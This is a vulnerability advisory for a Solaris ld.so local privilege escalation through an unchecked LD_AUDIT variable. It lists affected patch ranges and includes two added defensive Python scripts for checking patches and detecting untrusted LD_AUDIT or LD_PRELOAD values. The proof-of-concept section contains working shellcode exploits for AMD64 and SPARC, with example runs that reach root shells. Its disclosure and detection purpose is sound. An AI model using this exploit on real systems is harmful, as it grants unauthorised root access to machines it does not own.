Solaris Runtime Linker Security Vulnerability

Summary

The Solaris runtime linker (ld.so) fails to check the value of an environment variable, allowing a local attacker to gain root privileges.

Credit:

The information has been provided by Przemyslaw Frasunek.


Details

Vulnerable Systems:
SPARC and x86 platforms:
 * Solaris 8 with patches 109147-31 through 109147-36
 * Solaris 9 with patches 112963-16 through 112963-19
 * Solaris 10

Immune Systems:
 * Solaris 7 is not affected by this issue.
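A practitioner's first question is whether a given host falls inside the patch ranges listed above. The following script is an added example (not part of the advisory or Sun's tooling): it parses the "Patch: NNNNNN-RR" lines that `showrev -p` prints and classifies the host against the vulnerable-systems list exactly as stated here. The sample `showrev -p` lines are constructed for illustration, and the status labels ("outside stated range", "fixed") are this example's own wording; Solaris 10 is reported as vulnerable because the advisory lists it without a patch range.

```python
import re

# Vulnerable patch revisions exactly as the advisory lists them:
# release -> (ld.so patch id, first vulnerable rev, last vulnerable rev)
VULNERABLE_RANGES = {
    "8": ("109147", 31, 36),
    "9": ("112963", 16, 19),
}

# `showrev -p` prints one "Patch: NNNNNN-RR ..." line per installed patch.
PATCH_LINE = re.compile(r"^Patch:\s+(\d{6})-(\d{2})\b")


def parse_showrev(lines):
    """Map patch id -> highest installed revision from `showrev -p` output."""
    revs = {}
    for line in lines:
        m = PATCH_LINE.match(line.strip())
        if m:
            pid, rev = m.group(1), int(m.group(2))
            revs[pid] = max(rev, revs.get(pid, 0))
    return revs


def assess(release, revs):
    """Classify a host against the advisory's vulnerable-systems list.

    release: "7", "8", "9" or "10" (major Solaris release as a string)
    revs:    output of parse_showrev()
    Returns "not affected", "vulnerable", "fixed" or "outside stated range".
    """
    if release == "7":
        return "not affected"
    if release == "10":
        # Listed as vulnerable with no patch range; the vendor document
        # (see Vendor Status) is the place to look for the fixing patch.
        return "vulnerable"
    if release not in VULNERABLE_RANGES:
        raise ValueError("release not covered by the advisory: %r" % release)
    patch_id, first, last = VULNERABLE_RANGES[release]
    rev = revs.get(patch_id)
    if rev is None or rev < first:
        # Patch absent or older than the first revision the advisory names.
        return "outside stated range"
    if rev <= last:
        return "vulnerable"
    return "fixed"


# Constructed sample `showrev -p` output (not taken from any real host).
SAMPLE_SHOWREV = [
    "Patch: 109147-34 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu",
    "Patch: 123456-01 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu",
]

if __name__ == "__main__":
    revs = parse_showrev(SAMPLE_SHOWREV)
    print("Solaris 8 host with ld.so patch %s-%d: %s"
          % ("109147", revs["109147"], assess("8", revs)))
```

On a live host, feed it `showrev -p` output and the release from `uname -r` (5.8 is Solaris 8, 5.9 is Solaris 9); a revision above the listed range is treated as fixed only because the advisory names that range as the vulnerable one, so confirm against the vendor document before closing the finding.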

ld.so in Solaris 9 and 10 doesn't check the length of the LD_AUDIT environment variable when running setuid/setgid (s[ug]id) binaries, allowing an attacker to run arbitrary code with elevated privileges.
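Because ld.so loads the audit object named in LD_AUDIT before the privileged program's own code runs, a shell spawned through this flaw inherits an environment in which LD_AUDIT still points at a user-writable path. The detection logic below is an added example (not from the advisory): it parses `pargs -e` output for a set of processes and reports every uid-0 process whose LD_AUDIT or LD_PRELOAD names an object outside the trusted library directories. The trusted-directory list and the mapping of pid to uid are this example's assumptions, and the `pargs -e` text is constructed for illustration.

```python
import re

# Solaris trusted library directories, which are the only locations a
# setuid/setgid process should accept from LD_* variables. This list is an
# assumption of the example, not a statement from the advisory.
TRUSTED_PREFIXES = ("/usr/lib/secure/", "/lib/secure/")
WATCHED_VARS = ("LD_AUDIT", "LD_PRELOAD")

# `pargs -e PID` prints "PID:  command" followed by one "envp[N]: VAR=value"
# line per environment entry.
HEADER = re.compile(r"^(\d+):\s+(.*)$")
ENV_ENTRY = re.compile(r"^envp\[\d+\]:\s+([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


def parse_pargs(text):
    """Parse concatenated `pargs -e` output into
    {pid: {"cmd": command, "env": {var: value}}}."""
    procs, current = {}, None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = {"cmd": m.group(2).strip(), "env": {}}
            procs[int(m.group(1))] = current
            continue
        m = ENV_ENTRY.match(line)
        if m and current is not None:
            current["env"][m.group(1)] = m.group(2)
    return procs


def find_untrusted_ld_vars(procs, uid_of):
    """Return (pid, cmd, var, path) for every uid-0 process whose LD_AUDIT or
    LD_PRELOAD names an object outside the trusted directories.

    uid_of maps pid -> numeric uid (e.g. from `ps -eo pid,uid`)."""
    findings = []
    for pid, info in sorted(procs.items()):
        if uid_of.get(pid) != 0:
            continue
        for var in WATCHED_VARS:
            value = info["env"].get(var, "")
            # Both variables hold colon-separated lists of objects.
            for path in filter(None, value.split(":")):
                if not path.startswith(TRUSTED_PREFIXES):
                    findings.append((pid, info["cmd"], var, path))
    return findings


# Constructed sample `pargs -e` output and pid->uid map (not real data).
SAMPLE_PARGS = """\
1234:   /bin/ksh
envp[0]: LD_AUDIT=/tmp/dupa.so
envp[1]: PATH=/usr/bin:/bin
2000:   /usr/sbin/cron
envp[0]: PATH=/usr/sbin:/usr/bin
3000:   /usr/bin/ls
envp[0]: LD_PRELOAD=/usr/lib/secure/libcheck.so
4000:   /bin/sh
envp[0]: LD_AUDIT=/tmp/dupa.so
"""
SAMPLE_UIDS = {1234: 0, 2000: 0, 3000: 0, 4000: 1001}

if __name__ == "__main__":
    for pid, cmd, var, path in find_untrusted_ld_vars(parse_pargs(SAMPLE_PARGS), SAMPLE_UIDS):
        print("pid %d (%s) runs as root with %s=%s" % (pid, cmd, var, path))
```

Only root processes are reported: pid 4000 carries the same LD_AUDIT value but runs as an ordinary user, which is the normal precondition rather than evidence of success, while pid 1234 is a root shell that still carries the untrusted audit object and is the case worth escalating.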

Proof of Concept Code:
Solaris 10 (AMD64):
// dupa.c
// Audit library: ld.so calls la_version() in every LD_AUDIT object before the
// program's own code runs; this hook jumps straight into the embedded shellcode.
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb"
"\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01"
"\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f"
"\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07"
"\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52"
"\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() {
        void (*f)();
        f = (void*)sh;      /* treat the byte string as code */
        f();
        return 3;           /* audit interface version reported back to ld.so */
}

Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:
// dupa.c
// Same audit-library hook as the x86 version, with SPARC shellcode.
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
        void (*f)();
        f = (void*)sh;      /* treat the byte string as code */
        f();
        return 3;           /* audit interface version reported back to ld.so */
}

Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)

Vendor Status:
Sun has released an advisory that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

Categories: UNIX